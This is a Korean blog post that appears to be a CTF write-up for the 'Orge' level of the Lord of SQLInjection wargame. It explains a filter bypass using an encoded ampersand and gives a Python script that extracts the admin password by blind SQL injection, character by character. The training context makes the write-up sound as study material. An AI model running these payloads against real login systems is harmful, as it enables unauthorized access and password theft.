LOS(los.eagle-jump.org) Orge
이번 문제는 여지껏 풀었던 문제들을 합친 느낌의 문제입니다. 필터링 우회 + Blind SQLi 문제로 앞의 문제를 모두 이해하고 다 푸셨다면 어렵지 않게 푸실 수 있습니다. 다만 &의 경우 URL에 바로 입력하면 인식을 하지 못하므로 %26(&)을 넣어주셔야 합니다. 아래는 풀이 코드
...더보기
import urllib2
import requests
flag = ""
length = 0
i = 1
session = dict(PHPSESSID = "f1gj7fcplbdp1iupb9jcn1sd20")
url = "https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php?pw="
while True:
q = url + "' || id='admin'%26%26 length(pw)="+str(i)+"%23"
print 'TEST #',i
print q
r = requests.post(q, cookies=session)
if 'Hello admin' in r.text:
length = i
break
i = i + 1
print " PASSWORD LENGTH : ", length
for j in range(1, length +1):
for i in range(49,123):
q = url + "'||id='admin'%26%26substr(pw, "+str(j)+",1)="+"'"+chr(i)+"'"+"%23"
print 'TEST #', j, '-', i
print q
r = requests.post(q,cookies=session)
if 'Hello admin' in r.text:
flag += chr(i)
print "FLAG : ",flag
break
'Web Hacking > los.rubiya.kr' 카테고리의 다른 글
[Lord of SQLinjection] Vampire (0) | 2019.08.18 |
---|---|
[Lord of SQLInjection] Troll (0) | 2019.08.18 |
[Lord of SQLInjection] Darkelf (0) | 2019.08.18 |
[Lord of SQLInjection] Wolfman (0) | 2019.08.17 |
[Lord of SQLinjection] Orc (0) | 2019.08.16 |